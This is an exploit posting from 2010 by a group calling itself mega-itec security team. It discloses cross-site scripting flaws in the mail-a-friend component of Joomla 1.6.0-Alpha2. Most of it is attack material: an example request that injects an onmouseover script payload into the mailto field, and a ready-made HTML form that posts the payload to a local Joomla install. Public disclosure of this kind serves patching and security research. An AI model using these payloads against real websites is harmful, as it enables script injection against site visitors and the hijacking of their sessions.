# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
# Date: 2010-05-02
# Author: mega-itec.com
# Software Link:
http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip
# Version: 1.6.0-alpha2
# Tested on: [relevant os]
# CVE : 
# Code : 
[:::::::::::::::::::::::::::::::::::::: 0x1
::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
Author = mega-itec security team
Contact = securite@mega-itec.com 
 
[:::::::::::::::::::::::::::::::::::::: 0x2
::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = Joomla
Vendor = Joomla
Vendor Website = http://www.joomla.org/
Affected Version(s) = 1.6.0-Alpha2
 
  
[:::::::::::::::::::::::::::::::::::::: 0x3
::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = XSS ( POST ) mailto,subject,from,sender 
Example URI = 
option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode
link with base 64
 
>> #2 html code exploit : 
<form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php"
name="mailtoForm" method="post">

<div style="padding: 10px;">
	<div style="text-align:right">
		<a href="javascript: void window.close()">
			Close Window <img
src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png"
border="0" alt="" title="" /></a>
	</div>

	<h2>
		E-mail this link to a friend.	</h2>

	<p>
		E-mail to:
		<br />
		<input type="text" name="mailto" class="inputbox" size="25" value="�"
onmouseover=prompt(406426661849)//"/>
	</p>

	<p>
		Sender:
		<br />
		<input type="text" name="sender" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Your E-mail:
		<br />
		<input type="text" name="from" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Subject:
		<br />
		<input type="text" name="subject" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		<button class="button" onclick="return submitbutton('send');">
			Send		</button>
		<button class="button" onclick="window.close();return false;">
			Cancel		</button>
	</p>
</div>

	<input type="hidden" name="layout" value="default" />
	<input type="hidden" name="option" value="com_mailto" />
	<input type="hidden" name="task" value="send" />
	<input type="hidden" name="tmpl" value="component" />
	<input type="hidden" name="link" value="encode you link with base64" />
	<input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1"
/></form>
 
 
[:::::::::::::::::::::::::::::::::::::: 0x4
::::::::::::::::::::::::::::::::::::::]
>> Misc
mega-itec.com ::: mega-itec security team 
 
 
[:::::::::::::::::::::::::::::::::::::: EOF
::::::::::::::::::::::::::::::::::::::]